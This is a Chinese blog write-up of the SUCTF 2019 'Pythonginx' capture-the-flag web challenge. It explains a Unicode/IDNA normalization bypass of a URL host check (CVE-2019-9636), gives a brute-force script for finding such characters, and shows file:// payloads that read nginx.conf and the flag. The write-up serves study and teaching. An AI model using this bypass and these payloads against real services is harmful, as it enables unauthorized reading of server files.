[SUCTF 2019]Pythonginx

最新推荐文章于 2024-05-07 10:54:59 发布

yjj哈哈哈

最新推荐文章于 2024-05-07 10:54:59 发布

阅读量274

点赞数 2

分类专栏： web

本文链接：https://blog.youkuaiyun.com/qq_43774856/article/details/110469737

版权

web 专栏收录该内容

19 篇文章

订阅专栏

本文介绍了SUCTF 2019中涉及的Pythonginx挑战，通过分析源码和理解特定函数的作用，特别是针对host的条件判断，作者展示了如何构造爆破脚本来逃逸并找到有效的payload。最终，文章揭示了成功后的flag，并提供了相关nginx配置文件的位置和重要路径。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

[SUCTF 2019]Pythonginx

打开链接，得到源码
在这里插入图片描述

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

用一个例子解释一下一些函数的作用：

>>> from urllib import parse
>>> url = 'http://www.example.com/a?b&c=1#2'
>>> host = parse.urlparse(url).hostname	#urlparse对url进行分割，host等于其中的hostname
>>> parse.urlparse(url)					#查看一下效果
ParseResult(scheme='http', netloc='www.example.com', path='/a', params='', query='b&c=1', fragment='2')
>>> host								#查看host的内容
'www.example.com'
>>> parts = list(parse.urlsplit(url))	#同样的，urlsplit也是分割url，并保存为列表
>>> parts								#查看一下效果
['http', 'www.example.com', '/a', 'b&c=1', '2']
>>> host = parts[1]						#相当于也是取其中的hostname
>>> host
'www.example.com'
>>> finalUrl = parse.urlunsplit(parts).split(' ')[0]	#urlunsplit拼接为url
>>> finalUrl											#查看一下效果
'http://www.example.com/a?b&c=1#2'
>>>

这里总共有三个if语句，前两个要使host!=suctf.cc,最后一个要使host=suctf.cc。

CVE-2019-9636：urlsplit 不处理 NFKC 标准化
CVE-2019-10160：urlsplit NFKD 标准化漏洞

漏洞原理：
用 Punycode/IDNA 编码的 URL 使用 NFKC 规范化来分解字符。可能导致某些字符将新的段引入 URL。
例如，在直接比较中，\ uFF03不等于'＃'，而是统一化为'＃'，这会更改 URL 的片段部分。类似地，\ u2100 统一化为'a/c'，它引入了路径段。

>>> host = 'suctf.cⅭ'		#注意这里的Ⅽ并不是大写的C,而是一个Unicode码
>>> (host == 'suctf.cc')	#直接比较却不相等
False
>>> (host.encode('idna').decode('utf-8') == 'suctf.cc')	#但是经过idna编码后用utf-8解码后就相等了
True
>>>

接着我们只需要按照getUrl函数写出爆破脚本即可得到我们能够逃逸的构造语句了

from urllib.parse import urlparse,urlunsplit,urlsplit
from urllib import parse
def get_unicode():
    for x in range(65536):
        uni=chr(x)
        url="http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: "+uni+' unicode: \\u'+str(hex(x))[2:])
        except:
            pass
 
def getUrl(url):
    url=url
    host=parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts=list(urlsplit(url))
    host=parts[1]
    if host == 'suctf.cc':
        return False
    newhost=[]
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1]='.'.join(newhost)
    finalUrl=urlunsplit(parts).split(' ')[0]
    host=parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False
 
 
if __name__=='__main__':
    get_unicode()

最后结果
在这里插入图片描述
payload：

file://suctf.cⅭ/usr/local/nginx/conf/nginx.conf

在这里插入图片描述

file://suctf.cⅭ/usr/fffffflag

最后得到flag
在这里插入图片描述

贴上另外部分nginx的配置文件所在位置
配置文件存放目录：/etc/nginx
主配置文件：/etc/nginx/conf/nginx.conf
管理脚本：/usr/lib64/systemd/system/nginx.service
模块：/usr/lisb64/nginx/modules
应用程序：/usr/sbin/nginx
程序默认存放位置：/usr/share/nginx/html
日志默认存放位置：/var/log/nginx

https://zhuanlan.zhihu.com/p/104885386?utm_source=wechat_session
https://www.cnblogs.com/cimuhuashuimu/p/11490431.html